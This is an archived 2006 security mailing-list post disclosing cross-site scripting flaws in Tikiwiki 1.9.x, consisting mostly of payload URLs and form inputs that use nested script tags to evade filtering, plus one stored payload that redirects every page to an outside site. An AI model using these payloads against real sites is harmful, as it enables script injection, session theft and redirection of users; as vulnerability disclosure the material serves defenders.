Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Multiple XSS Vulnerabilities in Tikiwiki 1.9.x

from [blwood] Network Security [Permanent Link]
Subject: Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
Date: 25 May 2006 16:42:12 -0000 
Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
 
Discovered by Blwood
http://www.blwood.net
 
 
 
 
** Public **
 
 
-------------
 
Tiki-lastchanges
 
http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-lastchanges.php?days=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=0&sort_mode=user_desc
 
-------------

Tiki-orphan_pages.php
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&offset=&sort_mode=flag_desc
 
http://www.site.com/tikiwiki-1.9.3.1/tiki-orphan_pages.php?find=&offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=flag_desc
 
-------------
 
Tiki-listpages.php
 
http://www.site.com/tiki-listpages.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=creator_desc
 
http://www.site.com/tiki-listpages.php?initial=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=pageName_asc
 
-------------
 
Tiki-remind_password.php

http://tikiwiki.org/tiki-remind_password.php

"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
 
-------------
 
 
** Admin **
 
-------------
 
Tiki-admin_include_metatags.php
 
http://www.site.com/tiki-admin.php?page=metatags
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
In all pages the source will be :
 
<meta name="keywords" content=""><script>alert('Blwood')</script>" />
 
The code will be executed in every pages !
 
Exploit :
 
"><sc<script>ript>document.location='http://www.blwood.net'</scr</script>ipt>
 
-------------
 
Tiki-admin_ressmodules.php
 
http://www.site.com/tiki-admin_rssmodules.php?offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=name_desc&rssId=1
 
-------------
 
Tiki-syslog.php
 
http://www.site.com/tiki-syslog.php?find=&max=10&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=loguser_desc
 
http://www.site.com/tiki-syslog.php?find=&max=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&offset=0&sort_mode=logtype_desc
 
-------------
 
Tiki-adminusers.php
 
http://www.site.com/tiki-adminusers.php?find=&search=find&numrows=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E%3C!--&sort_mode=login_asc
 
In the Form :
 
"><scr<script>ipt>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_hotwords.php
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>

-------------
 
Tiki-admin_modules.php
 
Assign new module
**********************
 
Parameters : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 

Create new user module
****************************
 
Name : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_notifications.php
 
Add notification :
 
"><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
http://www.site.com/tiki-admin_notifications.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=object_desc
 
-------------
 
Tiki-admin_dsn.php
 
Name : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
Dsn : "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_content_templates.php
 
http://www.site.com/tiki-admin_content_templates.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=created_asc
 
Create new template :
 
name: "><sc<script>ript>alert('Blwood')</scr</script>ipt>
 
-------------
 
Tiki-admin_chat.php
 
http://www.site.com/tiki-admin_chat.php?offset=%22%3E%3Csc%3Cscript%3Eript%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E&sort_mode=name_desc&channelId=1
 
-------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Multiple XSS Vulnerabilities in Tikiwiki 1.9.x, blwood <=
Previous by Date:  Re[2]: [Full-disclosure] ASLR now built into Vista, 3APA3A
Next by Date:  RE: Realty Pro One Property Listing Script, Krpata, Tyler
Previous by Thread:  my Web Server << v-1.0 Denial of Service Exploit, s3rv3r_hack3r
Next by Thread:  [Full-disclosure] rPSA-2006-0083-1 enscript, Justin M. Forbes
Indexes:  [Date] [Thread] [Top] [All Lists]